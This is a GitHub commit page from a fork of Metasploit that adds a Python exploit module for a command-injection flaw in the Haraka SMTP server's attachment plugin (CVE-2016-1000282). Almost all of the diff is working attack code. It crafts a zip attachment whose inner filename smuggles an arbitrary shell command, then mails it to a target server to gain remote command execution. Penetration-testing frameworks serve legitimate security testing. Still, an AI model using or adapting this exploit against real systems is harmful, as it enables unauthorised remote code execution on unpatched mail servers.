forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
a3e196e
commit 6910cb0
Showing
1 changed file
with
114 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,114 @@ | ||
| #!/usr/bin/env python2.7 | ||
|
|
||
| # Vendor Homepage: https://haraka.github.io/ | ||
| # Software Link: https://github.com/haraka/Haraka | ||
| # Exploit github: http://github.com/outflankbv/Exploits/ | ||
| # Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8 | ||
| # Version: <= Haraka 2.8.8 (with attachment plugin enabled) | ||
| # Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS | ||
| # Tested versions: 2.8.8 and 2.7.2 | ||
| # Thanks to: Dexlab.nl for asking me to look at Haraka. | ||
|
|
||
| import smtplib | ||
| from email.mime.application import MIMEApplication | ||
| from email.mime.multipart import MIMEMultipart | ||
| from email.utils import COMMASPACE, formatdate | ||
| from email.header import Header | ||
| from email.utils import formataddr | ||
| from email.mime.text import MIMEText | ||
| from datetime import datetime | ||
| import zipfile | ||
| import StringIO | ||
| import sys, os, json | ||
|
|
||
| metadata = { | ||
| 'name': 'Haraka SMTP Command Injection', | ||
| 'description': ''' | ||
| The Haraka SMTP server comes with a plugin for processing attachments. | ||
| Versions before 2.8.9 can be vulnerable to command injection | ||
| ''', | ||
| 'authors': ['xychix <xychix[AT]hotmail.com>', 'smfreegard', 'Adam Cammack <adam_cammack[AT]rapid7.com>'], | ||
| 'date': '2017-01-26', | ||
| 'references': [ | ||
| {'type': 'cve', 'ref': '2016-1000282'}, | ||
| {'type': 'edb', 'ref': '41162'}, | ||
| {'type': 'url', 'ref': 'https://github.com/haraka/Haraka/pull/1606'}, | ||
| ], | ||
| 'type': 'remote_exploit.cmd_stager.wget', | ||
| 'privileged': True, | ||
| 'targets': [ | ||
| {'platform': 'linux', 'arch': 'x64'}, | ||
| {'platform': 'linux', 'arch': 'x86'} | ||
| ], | ||
| 'options': { | ||
| 'email_to': {'type': 'string', 'description': 'Email to send to, must be accepted by the server', 'required': True, 'default': 'admin@localhost'}, | ||
| 'email_from': {'type': 'string', 'description': 'Address to send from', 'required': True, 'default': '[email protected]'}, | ||
| 'rhost': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None}, | ||
| 'rport': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 25} | ||
| }} | ||
|
|
||
| def log(message, level='info'): | ||
| print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': { | ||
| 'level': level, | ||
| 'message': message | ||
| }})) | ||
| sys.stdout.flush() | ||
|
|
||
| def send_mail(to, mailserver, cmd, mfrom, port): | ||
| msg = MIMEMultipart() | ||
| html = "harakiri" | ||
| msg['Subject'] = "harakiri" | ||
| msg['From'] = mfrom | ||
| msg['To'] = to | ||
| f = "harakiri.zip" | ||
| msg.attach(MIMEText(html)) | ||
| log("Send harariki to %s, commandline: %s , mailserver %s is used for delivery"%(to, cmd, mailserver), 'debug') | ||
| part = MIMEApplication(create_zip(cmd),Name="harakiri.zip") | ||
| part['Content-Disposition'] = 'attachment; filename="harakiri.zip"' | ||
| msg.attach(part) | ||
| log("Sending mail to target server...") | ||
| log(msg.as_string(), 'debug') | ||
| s = smtplib.SMTP(mailserver, port) | ||
| try: | ||
| resp = s.sendmail(mfrom, to, msg.as_string()) | ||
| except smtplib.SMTPDataError, err: | ||
| if err[0] == 450: | ||
| log("Triggered bug in target server (%s)"%err[1], 'good') | ||
| return(True) | ||
| log("Bug not triggered in target server", 'error') | ||
| log("it may not be vulnerable or have the attachment plugin activated", 'error') | ||
| s.close() | ||
| return(False) | ||
|
|
||
| class InMemoryZip(object): | ||
| def __init__(self): | ||
| self.in_memory_zip = StringIO.StringIO() | ||
| def append(self, filename_in_zip, file_contents): | ||
| zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False) | ||
| zf.writestr(filename_in_zip, file_contents) | ||
| for zfile in zf.filelist: | ||
| zfile.create_system = 0 | ||
| return self | ||
| def read(self): | ||
| self.in_memory_zip.seek(0) | ||
| return self.in_memory_zip.read() | ||
|
|
||
| def create_zip(cmd="touch /tmp/harakiri"): | ||
| z1 = InMemoryZip() | ||
| z2 = InMemoryZip() | ||
| z2.append("harakiri.txt", | ||
| "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.") | ||
| z1.append("a\";%s;echo \"a.zip"%cmd, z2.read()) | ||
| return(z1.read()) | ||
|
|
||
| if __name__ == '__main__': | ||
| req = json.loads(os.read(0, 10000)) | ||
| if req['method'] == 'describe': | ||
| print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})) | ||
| elif req['method'] == 'run': | ||
| args = req['params'] | ||
| send_mail(args['email_to'], args['rhost'], args['command'], args['email_from'], int(args['rport'])) | ||
| print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': { | ||
| 'message': 'Exploit completed' | ||
| }})) | ||
| sys.stdout.flush() |